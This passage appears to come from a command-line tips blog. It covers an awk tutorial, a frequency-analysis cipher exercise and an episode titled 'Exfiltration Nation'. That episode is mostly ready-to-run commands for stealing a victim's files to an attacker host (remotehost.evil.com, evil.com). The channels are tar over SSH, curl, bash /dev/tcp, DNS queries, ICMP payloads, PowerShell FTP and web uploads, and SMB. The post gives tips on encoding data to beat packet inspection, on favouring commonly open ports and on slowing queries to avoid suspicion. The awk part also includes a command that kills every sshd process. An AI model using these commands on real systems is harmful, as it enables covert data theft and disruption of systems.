      2 108
      1 UID
      1 syslog
      1 rtkit
      1 ntp
      1 mysql
      1 gdm
      1 daemon
      1 102

Once we sort all the usernames in order, we can use "uniq -c" to count the number of processes running as each user. The final "sort -nr" gives us a descending ("-r") numeric ("-n") sort of the counts.

And this is fundamentally what's interesting about awk. It's great in the middle of a shell pipeline to be able to pull out individual fields that we're interested in processing further.

Lesson #3 -- Being selective

The other cool power of awk is that you can operate on selected lines of your input and ignore the rest. Any awk statement like "{print}" can optionally be preceded by a conditional expression. If a conditional expression is present, then your awk code will only operate on the lines that match it.

The most common conditional operator is "/.../", which does pattern matching. For example, I could pull out the process IDs of all sshd processes like this:

$ ps -ef | awk '/sshd/ {print $2}'
1366
10883

That output is maybe more interesting when you use it with the kill command to kick people off of your system:

# kill $(ps -ef | awk '/sshd/ {print $2}')

Of course, you better be on the system console when you execute that command. Otherwise, you've just locked yourself out of the box!

While pattern matching tends to get used most frequently, awk has a full suite of comparison and logical operators. Returning to our df example, what if we wanted to print out only the file systems that were more than 80% full? Remember that the percent used is in field 5 and the file system mount point is field 6. If field 5 is more than 80, we want to print field 6:

$ df -h -t ext4 | awk '($5 > 80) {print $6}'
Mounted
/home
/usr

Whoops! The header line ends up getting dumped out too! We'd actually like to suppress that. I could use the tail command to strip that out, but I can also do it in our awk statement:

$ df -h -t ext4 | awk '$5 ~ /[0-9]/ && ($5 > 80) {print $6}'
/home
/usr

"$5 ~ /[0-9]/" means do a pattern match specifically against field 5 and make sure it contains at least one digit. And then we check to make sure that field 5 is greater than 80. If both of those conditional expressions are true then we'll print out field 6. I made this more complicated than it needs to be just to show you that you can put together complicated logical expressions with "&&" (and "||" for the "or" relationship) and do pattern matching on specific fields if you want to.

Lesson #4 -- You don't have to split on whitespace

While splitting on whitespace is frequently useful, sometimes you're dealing with input that's broken up by some other character, like commas in a CSV file or colons in /etc/passwd. awk has a "-F" option that lets you specify a delimiter other than whitespace.

Here's a little trick to find out if you have any duplicate UIDs in your /etc/passwd file:

$ awk -F: '{print $3}' /etc/passwd | sort | uniq -d

Here we're merely using awk to pull the UID field (field 3) from the colon-delimited ("-F:") /etc/passwd file. Then we sort the UIDs and use "uniq -d" to tell us if there are any duplicates. You want this command to return no output, indicating no duplicates were found.
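
If that command does produce output, a follow-up along these lines (my own variation, not from the original post) will show you which account names share each duplicated UID:

$ awk -F: '{print $3}' /etc/passwd | sort | uniq -d |
    while read uid; do awk -F: -v u="$uid" '$3 == u {print $3, $1}' /etc/passwd; done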

The Rest is Practice

There's a lot more to awk, but this is more than enough to get you started with this useful little utility. But like any new skill, the best way to master awk is practice. So I'm going to give you a few exercises to work on. I'll post the answers on the blog in a week or so. Good luck!

  1. If you go back and look at the example where I counted the number of processes per user, you'll notice that the "UID" header from the ps command ends up being counted. How would you suppress this?

  2. Print out the usernames of all accounts with superuser privileges (UID is 0 in /etc/passwd).

  3. Print out the usernames of all accounts with null password fields in /etc/shadow.

  4. Print out process data for all commands being run as root by interactive users on the system (HINT: If the command is interactive, then the "TTY" column will have something other than a "?" in it)

  5. I mentioned that if you kill all the sshd processes while logged in via SSH, you'll be kicked out of the box (you killed your own sshd process) and unable to log back in (you've killed the master SSH daemon). Fix the awk so that it only prints out the PIDs of SSH daemon processes that (a) don't belong to you, and (b) aren't the master SSH daemon (HINT: The master SSH daemon is the one whose parent process ID is 1).

  6. Use awk to parse the output of the ifconfig command and print out the IP address of the local system.

  7. Parse the output of "lsof -nPi" and output the unique process name, PID, user ID, and port combinations for all processes that are in "LISTEN" mode on ports on the system.

Tuesday, January 24, 2012

Episode #165: What's the Frequency Kenneth?

Tim helps Tim crack the code

Long time reader, second time caller emailer writes in:

I've always been interested in mystery and codes (going back to 'Mystery Club' in 7th Grade), and today I discovered a cool show on History Channel called Decoded. They were talking about cryptography, specifically frequency analysis. I'm not an educator here but just to make sure we're on the same page: frequency analysis is one method of cracking a cipher by calculating how many times a certain cipher letter appears. From there, one can make a best guess on what the most frequent letters are.

Ok anyway, I've been doing some fun cipher puzzles in my spare time and thought about how this could be done in code. Say we have a document with a ciphertext (letters or numbers, separated by a comma or space). Is it possible to write code to do a frequency analysis on the ciphertext and maybe even replace the cipher with the results? So if the most frequent cipher symbols are 13 and 77, alter the document and replace 13 and 77 with the most common letters, E and T, for example.


This type of statistical analysis works better with longer ciphertext, so I created a substitution cipher that produced the following output. For the sake of simplicity, I didn't replace the punctuation or the spaces.

"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU? HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.


We can read a file using the command Get-Content (alias cat, gc, type) as we usually do, but let's use a Here-String instead.

PS C:\> $ciphertext = @"
"YETU HTPVI MOF UELCP MOF STC LCRVCU T DOOZ SLXEVW LK MOF ETRV CO VQXVWULIV LC UEV IFNAVSU?
HTMNV MOF STC, NFU LU'I COU UVWWLNJM JLPVJM. LHTDLCV EOY MOF YOFJZ WVTSU LK MOFW ZOSUOW UOJZ
MOF "MOF ETRV TXXVCZLSLULI, T ZLIVTIV UETU LI JLKV-UEWVTUVCLCD LK COU UWVTUVZ. YV ETRV T ULHV-
UVIUVZ SFWV UETU SFWVI 99% OK TJJ XTULVCUI YLUE CO COULSVTNJV ILZV-VKKVSUI, NFU L'H COU DOLCD
UO DLRV MOF UETU: L'H DOLCD UO DLRV MOF T CVY VQXVWLHVCUTJ UWVTUHVCU HM SOFILC ZWVTHVZ FX JTIU
YVVP. CO, HM SOFILC ETI CO HVZLSTJ UWTLCLCD. CO, L ETRV CO VRLZVCSV UETU UEV CVY UWVTUHVCU
YLJJ YOWP, TCZ LU'I CVRVW NVVC UVIUVZ OW TCTJMBVZ LC ZVXUE -- NFU L'H DOLCD UO DLRV LU UO MOF
TCMYTM NVSTFIV HM SOFILC UELCPI LU LI DOOZ IUFKK." MOF'Z KLCZ TCOUEVW ZOSUOW, L EOXV. WTULOCTJ
XVOXJV JVTRV HVZLSTJ STWV UO UEV HVZLSTJ VQXVWUI. UEV HVZLSTJ VQXVWUI ETRV T HFSE NVUUVW UWTSP
WVSOWZ UETC UEV GFTSPI."
-- ZTRLZ YTDCVW XEZ, ISL.SWMXU, 19UE OSU 02.
"@


We start a Here-String with @" and close it with the matching "@ pair. Now we have a variable $ciphertext that contains our text. Next, let's get the frequency of each character used in our ciphertext.

PS C:\> ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc


Count Name
----- ----
90 V
76 U
58 L
55 T
53 O
47 C
31 W
29 E
29 S
28 Z
28 I
27 F
22 M
21 J
19 H
15 D
15 X
13 R
12 Y
10 N
10 K
8 P
4 Q
1 G
1 B
1 A


We start by piping the ciphertext into the Select-String cmdlet where we use the regular expression "[A-Z]" to select each alphabet character individually. The AllMatches switch is used to return all the characters instead of just the first one found. The results are passed down the pipeline into the Group-Object cmdlet (alias group) to give us the count. The NoElement switch (shortened to noel) is used to discard the original objects as we don't need them in the output.

Let's save the letters into a variable so we can use it later for substitution.

PS C:\> $cipherletters = ($ciphertext | Select-String -AllMatches "[A-Z]").matches | 
group value -noel | sort count -desc | % { $_.Name }

PS C:\> $cipherletters
V
U
L
T
O
C
W
...


We used the same command as above, except with the added ForEach-Object cmdlet (alias %) where the value of the Name property is output and stored in our variable.

Now that we have our letters sorted by their frequency we need to compare them with the statistical frequency of characters in the English language.

e  12.702%
t 9.056%
a 8.167%
o 7.507%
i 6.966%
n 6.749%
s 6.327%
h 6.094%
r 5.987%
d 4.253%
l 4.025%
c 2.782%
u 2.758%
m 2.406%
w 2.360%
f 2.228%
g 2.015%
y 1.974%
p 1.929%
b 1.492%
v 0.978%
k 0.772%
j 0.153%
x 0.150%
q 0.095%
z 0.074%


We aren't going to worry about the percentages and we'll just get the letters in order. Later we'll map the two data sets together for our replacement.

PS C:\> $freqletters = "e","t","a","o","i","n","s","h","r","d","l","c","u",
"m","w","f","g","y","p","b","v","k","j","x","q","z"


Now for a quick substitution.

PS C:\> $replacedtext = $ciphertext
PS C:\> for ($i=0; $i -lt 26; $i++) { $replacedtext = $replacedtext -creplace
$cipherletters[$i], $freqletters[$i] }


We use a For loop to count from 0 to 25 where $i is used as the iterator. The iterator is used to match the Nth item in each array (remember, base zero) and use the mapped characters for replacement. The CReplace operator is used for a case sensitive replacement as our cipher letters are upper case and our clear text letters are lower case. This is done to prevent double substitution.

Now to see what our output looks like.

PS C:\> $replacedtext
"phot wokel uic thank uic ron anyent o fiid raghes av uic hoye ni ejgestale an the lcbzert?
woube uic ron, bct at'l nit tessabmu makemu. awofane hip uic picmd seort av uics dirtis timd
uic "uic hoye oggendaratal, o daleole thot al mave-thseotenanf av nit tseoted. pe hoye o tawe-
telted rcse thot rcsel 99% iv omm gotaentl path ni nitareobme lade-evvertl, bct a'w nit fianf
ti faye uic thot: a'w fianf ti faye uic o nep ejgesawentom tseotwent wu riclan dseowed cg molt
peek. ni, wu riclan hol ni wedarom tsoananf. ni, a hoye ni eyadenre thot the nep tseotwent
pamm pisk, ond at'l neyes been telted is onomuqed an degth -- bct a'w fianf ti faye at ti uic
onupou berocle wu riclan thankl at al fiid ltcvv." uic'd vand onithes dirtis, a hige. sotainom
geigme meoye wedarom rose ti the wedarom ejgestl. the wedarom ejgestl hoye o wcrh bettes tsork
serisd thon the xcorkl."
-- doyad pofnes ghd, lra.rsugt, 19th irt 02.


Well, that isn't great. It looks like the only words successfully decrypted are "the" and "been". There are a few more techniques for cryptanalysis of this type of cipher.

With a bit of tweaking and adjustment of the frequency letters we can end up with the following.

"What makes you think you can invent a good cipher if you have no expertise in
the subject? Maybe you can, but it's not terribly likely. Imagine how you would react
if your doctor told you "You have appendicitis, a disease that is life-threatening if
not treated. We have a time-tested cure that cures 99% of all patients with no
noticeable side-effects, but I'm not going to give you that: I'm going to give you a
new experimental treatment my cousin dreamed up last week. No, my cousin has no
medical training. No, I have no evidence that the new treatment will work, and it's
never been tested or analyzed in depth -- but I'm going to give it to you anyway
because my cousin thinks it is good stuff." You'd find another doctor, I hope.
Rational people leave medical care to the medical experts. The medical experts have a
much better track record than the quacks."
-- David Wagner PhD, sci.crypt, 19th Oct 02.


Let's see if Hal is a better cracker than I am.

Hal gets cracking

Gah. I was always terrible at these puzzles as a child. Maybe my shell can help!

Getting the frequency counts is just a matter of piling up a bunch of shell primitives:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr

90 V
76 U
58 L
55 T
53 O
...

Notice there's two substitutions in the sed program. The first eliminates anything that's not an uppercase letter. The second puts a newline after each letter in the remaining text. So what I get is each letter from the input text on a line by itself.

Unfortunately, sed doesn't give me a good way to deal with the newlines in the original message. So after the last letter on each line I'm going to get the newline I add with sed, followed by the newline from the original input file. This gives me blank lines in the sed output and I don't want them! The next grep in the pipeline takes care of only giving me the lines that have letters on them.

From there I sort my output and then use "uniq -c" to count the occurrences of each letter. The final "sort -nr" gives me the counts in descending order.

Now let's add a little awk:

$ sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr | awk 'BEGIN {ORS = ""} {print $2}'

VULTOCWSEZIFMJHXDRYNKPQGBA

The awk I've added prints out the letters from my frequency chart. Normally awk would print them out one per line, just like they are in the input. But in the BEGIN block I'm telling awk to use the null string as the "output record separator" (ORS) instead of the usual newline. That gives me the letters all on one line without any whitespace.

Why is this useful? Because now I can do this:

$ cat cyphertext | tr $(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' |
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}') \
etaoinshrdlcumwfgypbvkjxqz

"prot wokel uic trank uic hon anyent o giid hafres av uic roye ni ejfestale an tre
lcbzeht? woube uic hon, bct at'l nit tessabmu makemu. awogane rip uic picmd seoht av
uics dihtis timd uic "uic roye offendahatal, o daleole trot al mave-trseotenang av nit
tseoted. pe roye o tawe-telted hcse trot hcsel 99% iv omm fotaentl patr ni nitaheobme
lade-evvehtl, bct a'w nit giang ti gaye uic trot: a'w giang ti gaye uic o nep
ejfesawentom tseotwent wu hiclan dseowed cf molt peek. ni, wu hiclan rol ni wedahom
tsoanang. ni, a roye ni eyadenhe trot tre nep tseotwent pamm pisk, ond at'l neyes been
telted is onomuqed an deftr -- bct a'w giang ti gaye at ti uic onupou behocle wu
hiclan trankl at al giid ltcvv." uic'd vand onitres dihtis, a rife. sotainom feifme
meoye wedahom hose ti tre wedahom ejfestl. tre wedahom ejfestl roye o wchr bettes
tsohk sehisd tron tre xcohkl."
-- doyad pognes frd, lha.hsuft, 19tr iht 02.

What I did there was take my pipeline and put it inside "$(...)" so that the output of the pipeline becomes the first argument to my tr command. The letters in the list produced by my pipeline get replaced with the letters in the standard English frequency chart.

Unfortunately, as Tim found out, the standard frequency chart doesn't work. Actually, my results are different from Tim's first attempt. I think he was cheating somewhere to get his "the"'s decoded correctly!

If at first you don't succeed, try, try again. We could just keep trying different permutations of our frequency list:

$ freqlist=$(sed 's/[^A-Z]//g; s/\(.\)/\1\n/g' cyphertext | grep '[A-Z]' | 
sort | uniq -c | sort -nr |awk 'BEGIN {ORS = ""} {print $2}')

$ permute etaoinshrdlcumwfgypbvkjxqz |
while read replace; do
misspell=$(cat cyphertext | tr $freqlist $replace | spell | wc -l);
[[ $misspell -lt 10 ]] && echo $replace && break;
(( $((++c)) % 1000 )) || echo -n . 1>&2;
done

First I assign the frequency analysis of my cyphertext to a variable so I don't have to keep recomputing it.

Next I cheat a whole lot by using a script I wrote a long time ago called permute that produces a list of all possible permutations of its input. My while loop reads those permutations one at a time and tries them via tr. The output of tr goes into spell which will give a list of the misspelled words. I count the number of misspelled words with "wc -l". If the number of misspellings is small, then I've probably found the right replacement list. In that case I'll output the $replace list that seems to work and terminate the loop with break.

The last line of the loop is the trick I showed you in Episode #163 for showing progress output in a loop. Every 1000 permutations tried, we'll output a dot just so you know that things are working.

Be prepared for a lot of dots, however. Unfortunately there are 26! = 4E26 possible permutations, which might take you-- or your computer-- more than a little while to test. Brute force really isn't a practical solution for this problem. But I wanted to show you that there is a solution that you could implement in shell (modulo my dirty little permute script), even if it is a lousy one.

Tuesday, January 10, 2012

Episode #164: Exfiltration Nation

Hal pillages the mailbox

Happy 2012 everybody!

In the days and weeks to come, the industry press will no doubt be filled with stories of all the high-profile companies whose data was "liberated" during the past couple of weeks. It may be a holiday for most of us, but it's the perfect time for the black hats to be putting in a little overtime with their data exfiltration efforts.

So it was somehow appropriate that we found that loyal reader Greg Hetrick had emailed us this tasty little bit of command-line exfiltration fu:

tar zcf - localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"

Ah, yes, the old "tar over SSH" gambit. The nice thing here is that no local file gets written, but you end up with a perfect directory copy over on "remotehost.evil.com" in a target directory of your choosing.

If SSH is your preferred outbound channel, and the local system has rsync installed, you could accomplish the same mission with fewer keystrokes:

rsync -aH localfolder remotehost.evil.com:/some/path/name

If outbound port 22 is being blocked, you could use "ssh -p" or "rsync --port" to connect to the remote server on an alternate port number. Ports 80 and 443 are often open in the outbound direction when other ports are not.

But what if outbound SSH connections-- especially SSH traffic on unexpected port numbers-- are being monitored by your victim? Greg's email got me thinking about other stealthy ways to move data out of an organization using only command-line primitives.

My first thought was everybody's favorite exfiltration protocol: HTTPS. And nothing makes moving data over HTTPS easier than curl:

tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php

"curl -F" fakes a form POST. In this case, the submitted parameter name will be "data". Normally you would use "@filename" after the "data=" to post the contents of a file. But we don't want to write any files locally, so we use "@-" to tell curl to take data from the standard input.

Of course, you'd also have to create script.php over on the remote web server and have it save the incoming data so that you could manually unpack it later. And, while it's commonly found on Linux systems, curl is not a built-in tool. So strictly speaking, I'm not supposed to be using it according to the rules of our blog.

So no SSH and now no curl. What's left? Well, I could just shoot the tarball over the network in raw mode:

tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443

"/dev/tcp/remotehost.evil.com/443" is the wonderful bash-ism that allows me to make connections to arbitrary hosts and ports via the command-line. Note that because the "/dev/tcp/..." hack is a property of the bash shell, I can't use it as a file name argument to "tar -f". Instead I have to use redirection like you see in the example.

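Of course, something has to be listening on the far end to catch the stream. A netcat listener is the obvious choice-- though like curl it's not a built-in, and the flags differ between netcat flavors (traditional netcat wants "-l -p", the BSD variety just "-l")-- so treat this as a sketch:

nc -l -p 443 >loot.tgz    # catch the raw stream as it arrives
tar zxf loot.tgz          # unpack at your leisure
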
Maybe my victim is doing packet inspection. Perhaps I don't want to just send the unobfuscated tarball. I could use xxd to encode the tarball as a hex dump before sending:

tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443

You would use "xxd -r" on the other end to revert the hex dump back into binary.

Instead of xxd, I could use "base64" for a simple base64 encoding. But that might be too obvious. How about a nice EBCDIC encoding on top of the base64:

tar zcf - localfolder | base64 | dd conv=ebcdic >/dev/tcp/remotehost.evil.com/443

Use "dd conv=ascii if=filename | base64 -d" on the remote machine to get your data back. I'm guessing that nobody looking at the raw packet data would suspect EBCDIC as the encoding though.

Doing something like XOR encoding on the fly turns into a script, unfortunately. But there are some cool examples in several different languages (including the Unix shell and Windows Powershell) over here.
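
Just to show why it gets ugly, here's a sketch of a single-byte XOR filter built from nothing but bash arithmetic and xxd. The 0x5A key is an arbitrary choice of mine, and this will be excruciatingly slow on anything big, so think of it as a proof of concept rather than something you'd want to run for real:

key=0x5A    # arbitrary single-byte key
tar zcf - localfolder | xxd -p -c 1 |
while read b; do printf '%02x' $(( 0x$b ^ key )); done |
xxd -r -p >/dev/tcp/remotehost.evil.com/443

Run the captured stream back through the same filter with the same key on the other side and you get the original bytes back.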

Or how about using DNS queries to exfiltrate data:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do host $line.domain.com remotehost.evil.com; done

Once again I'm using xxd to encode my tar file as a hex dump. I read the hex dump line by line and use each line of data as the "host name" portion of a DNS query to my nameserver on remotehost.evil.com. By monitoring the DNS query traffic on the remote machine, I can reassemble the encoded data to get my original file content back.

Note that I've added the "-c 16" option to the xxd command to output 16 bytes (32 characters) per line. That way my "host names" are not flagged as invalid for being too long. You might also want to throw a "sleep" statement into that loop so that your victim doesn't become suspicious of the sudden blast of DNS queries leaving the box.
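
On the remotehost.evil.com side, one way to stitch the data back together is to sniff the incoming queries and strip the hex chunks off the front of each name. Something along these lines should get you close, though it's only a sketch: tcpdump output formats vary between versions, "host" fires off several query types per name (hence the uniq, which would also squash legitimately repeated adjacent chunks), and the short final chunk needs special handling:

tcpdump -l -n udp dst port 53 |
grep -o '[0-9a-f]\{32\}\.domain\.com' |
cut -d. -f1 | uniq | xxd -r -p >loot.tgz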

I could do something very similar using the ping command on Linux to exfiltrate my data in ICMP echo request packets:

tar zcf - localfolder | xxd -p -c 16 |
while read line; do ping -p $line -c 1 -q remotehost.evil.com; done

The Linux version of ping lets me use "-p" to specify up to 16 bytes of data to be included in the outgoing packet. Unfortunately, this option may not be supported on other Unix variants. I'm also using "-c 1" to send only a single instance of each packet and "-q" to reduce the amount of output I get. Of course, I'd have to scrape the content out of the packets on the other side, which will require a bit of scripting.
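
For what it's worth, the scraping can stay on the command line if you lean on tcpdump's hex output. Assuming a default-sized ping (56 data bytes), no IP options, and the stock Linux ping, a clean copy of the 16-byte pattern should land at bytes 44-59 of each IP packet (just past the timestamp ping embeds in its payload), which puts it across the "0x0020" and "0x0030" lines of the hex dump. That's a pile of assumptions, so this is strictly a sketch:

tcpdump -l -n -x 'icmp[icmptype] = icmp-echo' |
awk '/0x0020:/ {tail=$8 $9} /0x0030:/ {print tail $2 $3 $4 $5 $6 $7}' |
xxd -r -p >loot.tgz

As with the DNS trick, the short final chunk and any duplicate or reordered packets will need cleanup by hand.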

Well, I hope that gets your creative juices flowing. There are just so many different ways you can obfuscate data and move it around the network using the bash shell. But I think I'd better stop here before I make Tim cry. Now Tim, stop your sobbing and show us what you've got in Windows.

Tim wipes away his tears

I asked Santa for a few features to appear in Windows that are native to Linux, but all I got was a lump of coal. I keep asking Santa every year and he never writes back. I know people told me he doesn't exist, but HE DOES. He gave me a skateboard when I was 7. So yes, my apparent shunning by Santa made me cry.

I've got no built-in commands for ssh, tar, base64, curl/wget, /dev/tcp, or any of the cool stuff Hal has. FTP could be used, and it can support encryption, but you have to write a script for the FTP command (similar to this). While PowerShell scripts could be written to implement most of these functions, that would definitely cross into The Land of Scripts (and they have a restraining order against us, something about Hal not wearing pants last time he visited).

That pretty much leaves SMB connections, and those have a number of problems. First, we don't get encryption, which may mean we can't use it on a Pen Test. Second, port 445 is usually heavily monitored or filtered. Third, we can't pick a different port; we're stuck with 445.

On the bright side it means that my portion of this episode is going to be short. First, we create the connection back to our server.

C:\> net use z: \\4.4.4.4\myshare myevilpassword1 /user:myeviluser


Then we can copy all the files we want to the Z: drive. We can accomplish this using Robocopy or PowerShell's Copy-Item (aliases copy, cp, and cpi) with the -Recurse switch.

Yep, that's it. Now back to my crying. Oh, and Happy Stinking New Year.

Edit: Marc van Orsouw writes in with the following
Some remarks about PowerShell options:

Of course you do not need the net use in PowerShell; you can use UNC paths directly.
And there are a lot of options on your wishlist that can be done using .NET -- mostly resulting in scripts or one-liners of course, so keep your list ;-) -- although PSCX will solve a lot of them.

Some options I came up with :

Another cool option, IMHO, is using PowerShell remoting (already encrypted).

This could be as easy as:

Invoke-Command -ComputerName evilserver {PARAM($txt);set-content stolen.txt $txt} -ArgumentList (get-content usernames.txt)

An ugly FTP example with Base64:

[System.Net.FtpWebRequest][System.Net.WebRequest]::Create('ftp://evil.com/p.txt') |% {$_.Method = "STOR";$s = [byte[]][convert]::ToBase64String([System.IO.File]::ReadAllBytes('C:\username.txt')).tochararray();$_.GetRequestStream().Write($s, 0, $s.Length)}

And with a web service, when a remote server is available (as in the PHP example), then it would be as simple as:

(New-WebServiceProxy -uri http://evil.com/store.asmx?WSDL).steal((get-content file.txt))


We can just use the UNC path (\\1.1.1.1\share instead of z:\) for exfiltration, but if we want to authenticate, the best way is to use NET USE first.

The PowerShell Community Extensions (PSCX) do give a lot of cool functionality, but they are add-ons and not allowed. Similarly, the .NET framework gives us tremendous power, but crosses into script-land rather quickly and is also not allowed.

The remoting command is really cool *and* it is encrypted too. I forgot about this one. The New-WebServiceProxy cmdlet is a really intriguing way to do this as well. I have never used this cmdlet before, and if we use HTTPS instead of HTTP it would be encrypted too. Very nice!

Edit 2: Marc van Orsouw has another cool suggestion
PS C:\> Import-Module BitsTransfer
PS C:\> Start-BitsTransfer -Source c:\clienttestdir\testfile1.txt -Destination https://server01/servertestdir/testfile1.txt -TransferType Upload -cred (get-credential)


Marc is a PowerShell MVP and blogs over at http://thepowershellguy.com/